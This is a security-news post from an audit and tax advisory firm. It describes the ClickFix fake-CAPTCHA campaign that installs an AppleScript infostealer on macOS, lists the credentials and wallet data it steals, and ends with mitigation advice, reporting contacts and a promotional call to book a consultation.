ClickFix macOS Attack: Fake CAPTCHA Steals Crypto Wallets, Browser Passwords and Apple Keychain

A new cyberattack campaign targeting macOS users — named ClickFix — is deploying an AppleScript-based infostealer through a fake CAPTCHA social engineering technique, stealing browser passwords, session cookies, cryptocurrency wallet data, Apple Keychain credentials, and data from 200+ browser extensions. The campaign has been active since at least March 2026, with new incidents continuing to surface. Primary targets: users in Asia, particularly those in the financial sector — indicating a coordinated, financially motivated operation. Affected: all major Chromium-based browsers (Chrome, Edge, Brave, Opera); 200+ browser extensions including MetaMask, Phantom, Trust Wallet, Coinbase Wallet; password managers including 1Password, Bitwarden, Dashlane, LastPass; and authentication tools including Authy and Google Authenticator extensions.

The ClickFix Attack Method: Fake CAPTCHA → Malicious Command

Step 1: victim redirected to a fake CAPTCHA verification page closely resembling a legitimate website. Step 2: victim instructed to copy a “verification code” and paste it into macOS Spotlight. Step 3: the “verification code” is a malicious curl command that silently downloads malware from an attacker-controlled server and executes it. Step 4: malware collects system information, creates hidden directories to store stolen data, and transmits everything to remote command-and-control servers. Step 5 — Credential coercion: malware displays a fake macOS security dialog box mimicking genuine Apple system alerts (using authentic system icons); dialog repeatedly reappears until the user enters their system password; password immediately captured and sent to attackers. Step 6 — Keychain extraction: malware extracts macOS Keychain data including saved passwords, Wi-Fi credentials, secure notes, and encryption keys.

What Gets Stolen

System level: macOS username + system information; system password (via fake dialog coercion); Apple Keychain (all saved passwords, Wi-Fi credentials, secure notes, encryption keys). Browser level (all Chromium browsers): session tokens + cookies; autofill data; saved passwords; credit card information. Crypto wallets (200+ extensions): MetaMask, Phantom, Trust Wallet, Coinbase Wallet — wallet seed phrases, private keys, and session data. Password managers: 1Password, Bitwarden, Dashlane, LastPass — vault access data. Authentication tools: Authy, Google Authenticator extensions — 2FA seed data.

Why This Attack Is Particularly Dangerous

The ClickFix method bypasses technical security controls entirely by exploiting human behaviour: the victim executes the malicious command themselves, believing it is a CAPTCHA verification step. No exploit, no vulnerability, no malware download prompt — the victim is the delivery mechanism. Apple’s macOS security warnings (introduced in recent versions) alert users when pasting potentially harmful commands into system terminals — but users running outdated systems or those who ignore security warnings remain fully vulnerable. The fake macOS dialog’s use of authentic Apple system icons makes it visually indistinguishable from legitimate system prompts for most users.

Shunyatax Global Insight

The ClickFix campaign’s primary targeting of Asia’s financial sector users is the specific risk signal for Indian finance professionals, NRI investors, and UAE-based business owners who use macOS for business operations. The combination of Keychain theft + crypto wallet extraction + password manager compromise in a single attack means a successful ClickFix infection gives the attacker access to every credential stored on the device — banking portals, GST login, EmaraTax, business email, and cryptocurrency holdings simultaneously.

For Indian businesses and NRIs using macOS for financial operations, the ClickFix attack has a specific audit implication: any credential stored in Chrome’s saved passwords, macOS Keychain, or a browser-based password manager extension is potentially compromised if the device has been exposed to a fake CAPTCHA page. Professional auditing services in India that include digital security protocol review — ensuring business financial credentials are stored in hardware-backed password managers (not browser-based extensions), that macOS systems are updated to the latest version, and that business banking uses hardware MFA tokens rather than authenticator app extensions — provide the security architecture that limits ClickFix’s credential harvest to non-critical data. The 200+ affected browser extensions include every major crypto wallet and password manager; the mitigation is hardware-backed credential storage that browser-level malware cannot access.

Immediate action if exposed: change all passwords from a separate, unaffected device; revoke all active browser sessions; rotate crypto wallet seed phrases to new wallets; contact your bank’s fraud team. Report: CERT-In at cert-in.org.in / cybercrime.gov.in / 1930.

🔍 Are your business financial credentials stored in hardware-backed systems rather than browser extensions vulnerable to infostealer attacks? Get a free strategy call with Shunyatax Global →

Quick News Summary

ClickFix campaign (active since March 2026): macOS-targeted AppleScript infostealer via fake CAPTCHA social engineering. Method: fake CAPTCHA page → victim copies “verification code” → pastes into macOS Spotlight → malicious curl command executes → malware downloads + activates. Credential coercion: fake Apple system dialog (authentic icons) repeatedly appears until system password entered → immediately captured. Stolen: Keychain (passwords, Wi-Fi, secure notes, encryption keys); all Chromium browser data (session tokens, cookies, autofill, saved passwords, credit cards); 200+ browser extensions including MetaMask, Phantom, Trust Wallet, Coinbase Wallet, 1Password, Bitwarden, Dashlane, LastPass, Authy, Google Authenticator. Primary targets: Asia financial sector users. Apple mitigation: macOS security warnings for terminal paste commands (recent versions only). Key insight: no technical exploit — victim executes malicious command themselves via social engineering. Immediate response: change all passwords from separate device; revoke browser sessions; rotate crypto wallets; contact bank fraud team. Report: cert-in.org.in / 1930.